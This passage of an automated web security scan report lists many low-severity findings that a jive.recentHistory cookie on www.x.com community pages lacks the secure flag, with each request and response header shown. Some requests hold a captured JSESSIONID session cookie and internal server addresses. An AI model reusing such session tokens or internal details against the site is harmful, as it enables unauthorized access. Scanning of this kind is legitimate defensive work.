Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.47. https://www.x.com/community/ppx/recurring_billing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.48. https://www.x.com/community/ppx/recurring_payments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.49. https://www.x.com/community/ppx/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.50. https://www.x.com/community/ppx/sdks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.51. https://www.x.com/community/ppx/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.52. https://www.x.com/community/ppx/showcase/ap_directory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.53. https://www.x.com/community/ppx/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.54. https://www.x.com/community/ppx/system_status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.55. https://www.x.com/community/ppx/testing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.56. https://www.x.com/community/ppx/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.57. https://www.x.com/community/ppx/transaction_information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.58. https://www.x.com/community/ppx/vt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.59. https://www.x.com/community/ppx/website_reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.60. https://www.x.com/community/ppx/wpp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.61. https://www.x.com/community/ppx/wpphosted  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.62. https://www.x.com/community/ppx/wps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.63. https://www.x.com/community/ppx/xspaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.64. https://www.x.com/community/ppx/xspaces/accelerator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.65. https://www.x.com/community/ppx/xspaces/certification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.66. https://www.x.com/community/ppx/xspaces/cloud-computing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
